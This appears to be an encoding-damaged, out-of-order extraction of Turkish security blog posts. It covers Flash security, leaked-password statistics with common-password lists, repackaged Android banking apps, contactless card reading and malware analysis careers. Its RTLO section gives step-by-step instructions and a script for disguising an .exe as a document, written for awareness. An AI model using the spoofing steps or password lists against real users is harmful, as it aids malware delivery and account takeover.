olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 14: Hack 4 Career - 2011

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini 